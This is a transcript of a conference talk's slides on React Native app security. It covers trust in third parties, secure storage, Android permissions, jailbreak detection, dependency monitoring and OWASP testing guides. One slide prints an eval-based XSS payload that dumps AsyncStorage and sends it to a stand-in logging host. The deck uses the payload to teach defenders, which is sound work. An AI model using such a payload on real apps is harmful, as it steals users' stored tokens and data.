$30 off During Our Annual Pro Sale. View Details »

React Native Security

Julia Mezher
September 24, 2021

React Native Security

Julia Mezher

September 24, 2021
Tweet

More Decks by Julia Mezher

Other Decks in Programming

Transcript

  1. Name Surname
    Sed ut perspiciatis unde omnis iste
    natus error sit voluptatem
    accusantium doloremque
    laudantium
    Sed ut perspiciatis unde omnis iste natus error sit
    voluptatem accusantium doloremque laudantium
    something.org
    Julia Potapenko
    React Native Security


    Addressing Typical Mistakes
    Let's shed light on React Native apps’ security and
    explain some risks and threats developers should
    address to prevent typical mistakes.
    @julepka cossacklabs.com

    View Slide

  2. Name Surname
    Sed ut perspiciatis unde omnis iste
    natus error sit voluptatem
    accusantium doloremque
    laudantium
    Sed ut perspiciatis unde omnis iste natus error sit
    voluptatem accusantium doloremque laudantium
    something.org
    Julia Potapenko
    About me 👩💻
    Security Software Engineer at Cossack Labs


    Leader of OWASP Zhytomyr Chapter, Ukraine 🇺🇦


    ❤︎
    OWASP MASVS/MSTG Project
    @julepka cossacklabs.com
    We help companies to protect their
    sensitive and valuable data.

    View Slide

  3. React Native Security.


    Addressing Typical
    Mistakes
    We will talk about
    Architecture


    Platforms usage


    Dependencies


    Security testing

    View Slide

  4. React Native Security.


    Addressing Typical
    Mistakes
    “Choosing React Native and its components
    means that you understand and accept
    potential security consequences.”

    View Slide

  5. React Native Security.


    Addressing Typical
    Mistakes
    Architecture basics
    React Native is a cross-platform solution from Facebook that
    allows writing native apps using React (JavaScript or
    TypeScript).

    View Slide

  6. React Native Security.


    Addressing Typical
    Mistakes
    Trusting third parties
    Native platforms = Apple and Google


    React Native = Facebook


    TypeScript = Microsoft

    View Slide

  7. React Native Security.


    Addressing Typical
    Mistakes
    Trusting third parties
    Native platforms = Apple and Google


    React Native = Facebook


    TypeScript = Microsoft

    View Slide

  8. React Native Security.


    Addressing Typical
    Mistakes
    Trusting third parties
    Native platforms = Apple and Google


    React Native = Facebook


    TypeScript = Microsoft CVE-2020-1911

    CVE-2020-1912

    CVE-2020-1913

    View Slide

  9. React Native Security.


    Addressing Typical
    Mistakes
    “With React Native, developers deal with
    security for all three platforms: iOS, Android
    and React Native.”

    View Slide

  10. React Native Security.


    Addressing Typical
    Mistakes
    OWASP Mobile


    Top 10
    #1


    Improper Platform
    Usage

    View Slide

  11. React Native Security.


    Addressing Typical
    Mistakes
    React Native is a leaky abstraction
    @vixentael

    View Slide

  12. Secure Store Example
    iOS Android
    Keychain
    SharedPreferences +
    KeyStore
    Data stored encrypted Yes Yes
    React Native Security.


    Addressing Typical
    Mistakes

    View Slide

  13. Secure Store Example
    iOS Android
    Keychain
    SharedPreferences +
    KeyStore
    Data stored encrypted Yes Yes
    Data persists across app
    reinstalls
    Yes No
    Hardware-backed
    encryption
    Yes
    Depends on device
    vendor
    Data decrypted only
    before usage
    Decrypted when device
    unlocked
    Yes
    React Native Security.


    Addressing Typical
    Mistakes

    View Slide

  14. Managing Android Permissions
    React Native Security.


    Addressing Typical
    Mistakes

    View Slide

  15. Managing Android Permissions
    React Native Security.


    Addressing Typical
    Mistakes
    Android: You can add permissions in multiple files


    +


    React Native: It is common practice to use third-party
    solutions

    View Slide

  16. Managing Android Permissions
    React Native Security.


    Addressing Typical
    Mistakes
    Android: You can add permissions in multiple files


    +


    React Native: It is common practice to use third-party
    solutions


    =


    💥🤯💥
    I don’t need this permission
    The app crashes if I delete it

    View Slide

  17. Is XSS possible?
    React Native Security.


    Addressing Typical
    Mistakes
    XSS possibility is decreases by design.


    View Slide

  18. Is XSS possible?
    React Native Security.


    Addressing Typical
    Mistakes
    XSS possibility is decreases by design.


    XSS is still possible.
    eval()
    _reactNative.AsyncStorage.getAllKeys(function(err,result)
    {_reactNative.AsyncStorage.multiGet(result,function(err,result
    )

    {fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});});
    Steal all the data from local storage (AsyncStorage) by exploiting eval-
    based injection and accessing React Native APIs

    View Slide

  19. Jailbreak and Root detection
    React Native Security.


    Addressing Typical
    Mistakes
    It is never easy for regular iOS and Android teams.


    View Slide

  20. Jailbreak and Root detection
    React Native Security.


    Addressing Typical
    Mistakes
    It is never easy for regular iOS and Android teams.


    There are no ready to go React Native solutions:


    a. implement on your own


    b. use third-party solutions for each platform and write bridging code


    View Slide

  21. Jailbreak and Root detection
    React Native Security.


    Addressing Typical
    Mistakes
    It is never easy for regular iOS and Android teams.


    There are no ready to go React Native solutions:


    a. implement on your own


    b. use third-party solutions for each platform and write bridging code


    Example: IOSSecuritySuite https://github.com/securing/IOSSecuritySuite


    Swift ➤ Objective-C ➤ React Native

    View Slide

  22. React Native Security.


    Addressing Typical
    Mistakes
    “50 shades of dependencies”

    View Slide

  23. A typical situation
    React Native Security.


    Addressing Typical
    Mistakes

    View Slide

  24. A typical situation
    React Native Security.


    Addressing Typical
    Mistakes
    They’ve updated dependencies half year later…

    View Slide

  25. Monitoring dependencies
    React Native Security.


    Addressing Typical
    Mistakes
    🤯
    So many dependencies
    Additional CI work
    One update triggers another update
    Integrating dependency checkers
    Updates may be incompatible
    What if there is no fix for vulnerability?
    Architectural changes required
    Tight deadlines

    View Slide

  26. What if there is no fix?
    React Native Security.


    Addressing Typical
    Mistakes
    ✅ Learn more about the issue, its scope


    ✅ Document it, make the team aware


    ✅ Monitor it and book the time for the update

    View Slide

  27. Plan time carefully!
    React Native Security.


    Addressing Typical
    Mistakes
    ➡ iOS or Android update


    ➡ React Native update


    ➡ Forked version update


    ➡ Dependencies update


    ➡ Mobile app source code update

    View Slide

  28. React Native Security.


    Addressing Typical
    Mistakes
    Security testing of React Native apps

    View Slide

  29. React Native Security.


    Addressing Typical
    Mistakes
    OWASP MASVS
    Mobile Application Security Verification
    Standard


    https://github.com/OWASP/owasp-masvs


    Mobile Security Testing Guide


    https://github.com/OWASP/owasp-mstg
    OWASP MSTG

    View Slide

  30. React Native Security.


    Addressing Typical
    Mistakes
    OWASP MASVS
    Mobile Application Security Verification
    Standard


    https://github.com/OWASP/owasp-masvs


    Mobile Security Testing Guide


    https://github.com/OWASP/owasp-mstg
    OWASP MSTG
    “Please note that the MSTG focuses primarily
    on native apps. These are apps built with
    Java or Kotlin using the Android SDK for
    Android or built with Swift or Objective-C
    using the Apple SDKs for iOS. Apps using
    frameworks such as Nativescript, React-
    native, Xamarin, Cordova, etc. are not within
    the main focus of the MSTG. However, some
    essential controls, such as certificate pinning,
    have been explained already for some of
    these platforms.”

    View Slide

  31. You can still use MASVS!
    React Native Security.


    Addressing Typical
    Mistakes
    OWASP MASVS is language agnostic. All requirements are relevant
    for React Native apps because they are “native” under the hood.

    View Slide

  32. React Native Security.


    Addressing Typical
    Mistakes
    General ideas will be similar. You either look for similar JavaScript
    implementation or native code with bridging functions.
    You can still use MSTG!

    View Slide

  33. How do we test RN app security?
    React Native Security.


    Addressing Typical
    Mistakes
    1. Use MASVS requirements.


    2. Review JavaScript dependencies’ source code to understand
    native controls behind it.


    You need to be able to read all the languages: JavaScript
    (TypeScript), Objective-C (Swift), Java (Kotlin).


    3. Use ASVS and WSTG to cover JavaScript-specific vulnerabilities
    like XSS.

    View Slide

  34. Final thoughts…
    React Native Security.


    Addressing Typical
    Mistakes
    “Learn once, write anywhere.”

    View Slide

  35. Final thoughts…
    React Native Security.


    Addressing Typical
    Mistakes
    “Learn once, write anywhere.”
    “Learn once, ask mobile security
    people for help.”

    View Slide

  36. Where to go next?
    React Native Security.


    Addressing Typical
    Mistakes
    My React Native Security Article


    https://www.cossacklabs.com/blog/react-native-app-security.html


    React Native Security Guide


    https://reactnative.dev/docs/security


    OWASP MASVS Hybrid Apps discussion


    https://github.com/OWASP/owasp-masvs/discussions/557

    View Slide

  37. Thank you!


    @julepka

    View Slide